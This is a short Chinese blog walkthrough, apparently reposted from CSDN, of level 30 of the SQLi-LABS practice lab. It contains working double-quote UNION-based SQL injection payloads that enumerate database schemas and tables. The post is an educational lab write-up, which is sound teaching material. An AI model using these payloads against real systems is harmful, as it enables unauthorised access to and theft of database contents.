SQLi LABS Less-30

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第30关使用GET请求传递参数,在url中构造payload即可

后端源码中并没有做什么过滤,只是在参数两边添加了双引号

img

 img

 img

 

输入 1" and true-- a,页面正常显示

img

 输入 1" and false-- a,页面空显示

img

 由此可证明存在SQL注入,注入点为双引号字符型注入

页面中有显示位,可以使用联合注入进行脱库

-1" union select 1,2,
(select group_concat(schema_name) from information_schema.schemata)
-- a

img

 

脱表

-1" union select 1,2,
(select group_concat(table_name) from information_schema.tables
where table_schema='security')
-- a

img

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/119730818
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复